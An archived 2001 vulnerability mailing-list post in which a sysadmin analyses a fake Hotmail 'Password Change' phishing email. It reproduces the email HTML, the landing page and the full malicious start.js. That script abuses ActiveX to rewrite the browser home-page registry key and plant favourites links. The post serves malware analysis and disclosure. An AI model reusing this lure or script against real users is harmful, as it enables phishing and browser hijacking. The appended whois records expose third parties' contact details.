Vulnerability Development mailing list archives
Hotmail message malware
From: quentyn () fotango com
Date: Fri, 10 Aug 2001 14:09:24 +0100
there appears to be a new hotmail malware thingy it is sent from admin02 () hotmail com with the subject line of Password Change wonder how many people it will get before all the sites are closed? Detail - I just recieved this mail from 202.104.122.157 [1] #START
From admin02 () hotmail com Thu, 09 Aug 2001 18:21:54 -0700
Received: from [202.104.122.157] by hotmail.com (3.2) with ESMTP id
MHotMailBD3C81DB0068400431DDCA687A9D0C810; Thu, 09 Aug 2001 18:20:28
-0700
Received: FROM html BY mail-server ; Fri Aug 10 09:17:50 2001 +0800
From: admin02 () hotmail com
To: ${MYEMAIL}@hotmail.com
Subject: Password Change
Date: Sat, 8 Sep 2001 08:13:32
Mime-Version: 1.0
Content-Type: text/html; charset="DEFAULT_CHARSET"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
<HTML>
<HEAD>
</HEAD>
<BODY TEXT="#000000" BGCOLOR="#336699" LINK="yellow" VLINK="#551A8B"
ALINK="#FF0000">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Password Change
Confirmation</B></FONT>
</P>
<P ALIGN="CENTER"><FONT SIZE="+1"><B>Your Password has been successfully
changed. Please remember your new Password. </B></FONT></P>
<P ALIGN="CENTER"><FONT COLOR="#FFFF80"><A
HREF="http://maeveshomepage.com/ty.htm";>If you did not authorize this
please
click here to restore your old password.</A></FONT> </P>
</BODY>
</HTML>
#END
now going to maeveshomepage.com/ty.htm [2] in opera shows
#START
<!DOCTYPE HTML PUBLIC "-//SoftQuad//DTD HoTMetaL PRO
5.0::19980907::extensions to HTML 4.0//EN" "hmpro5.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY BGCOLOR="#336699">
<P ALIGN="CENTER"><FONT SIZE="+3"><B>Thank You</B></FONT> </P>
<P ALIGN="CENTER"><FONT SIZE="+2">Your old password has been
restored.</FONT> <SCRIPT SRC="start.js">
</SCRIPT>
</P>
</BODY>
</HTML>
#END
and looking at start.js (the interesting bit)
#START
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>") function AddFavLnk(loc,
DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
} function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject(); try{ var expdate = new Date((new Date()).getTime()
+ (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
///////////////////////////////////////////////////////////////////////////////Ö÷Ò³
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page", "http://yahhooo.devil.ru/";);
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName
+ "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
///////////////////////////////////////////////////////////////////////////////ÊղؼÐ
AddFavLnk(loc, " Britney Spears Nude",
"http://www.celebrities-revealed.com";);
AddFavLnk(loc, " Aol", "http://www.aol.com";);
}
catch(e){ }
}
catch(e){ }
}
function init(){
setTimeout("f()", 1000);
}
init();
#END
it appears to set your default home page to http://yahhooo.devil.ru/ [3]
and get your favorites (which may contain saved usernames and passwords)
anybody got anything further?
Q
Notes
[1] - inetnum: 202.104.122.128 - 202.104.122.159
netname: SHENZHEN-JLXXCY-INFOR-LTD
descr: SHENZHEN JULINGXINXICHANYE INFORMATION CO.LTD
country: CN
admin-c: HB58-AP
tech-c: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadm () gddc com cn 20000920
source: APNIC
person: HU BOG
address: F11,BUSSINESS NEWSPAPER OLYMPIC MANSION,SHENZHEN
country: CN
phone: +86-755-3521135
fax-no: +86-755-3396971
e-mail: ipuser () gddc com cn
nic-hdl: HB58-AP
mnt-by: MAINT-CHINANET-GD
changed: ipadm () gddc com cn 20000920
source: APNIC
[2] - Registrant:
JBO
223 S. 5th
usa, O ---
US
Domain Name: MAEVESHOMEPAGE.COM
Administrative Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212
Technical Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212
Billing Contact:
I, TJ bwestby () midwest net
223 S. 5th
usa, O ---
US
1115551212
Record last updated on 11-Jul-2001.
Record expires on 07-May-2002.
Record Created on 07-May-2001.
Domain servers in listed order:
NS1.VEGASSECURE.NET 208.50.15.6
NS2.VEGASSECURE.NET 208.50.15.7
[3] - domain: DEVIL.RU
type: CORPORATE
admin-o: AK2000-RIPN
nserver: ns.kravchenko.ru.
nserver: srvr.list.ru.
created: 07-AUG-2000
state: Delegated
changed: 19-MAY-2001
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN
person: Andrey S Kravchenko
nic-hdl: AK2000-RIPN
address: Teatralny st 23a/30,
address: Donetsk, Ukraine, 340100
phone: +7 902 6010000
fax-no: +7 902 6010000
e-mail: andrey () kravchenko ru
changed: 18-AUG-2000
mnt-by: ANDRIUSHA-MNT-RIPN
source: RIPN
--
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
You're damn right we need a rational code of morality and ethics. But
not much progress can
be made in that direction while we've still got a majority ranting about
gods, devils, souls, and
absolute morality, and using an ancient book written by ignorant nomads
as a guide.
Current thread:
- Hotmail message malware quentyn (Aug 10)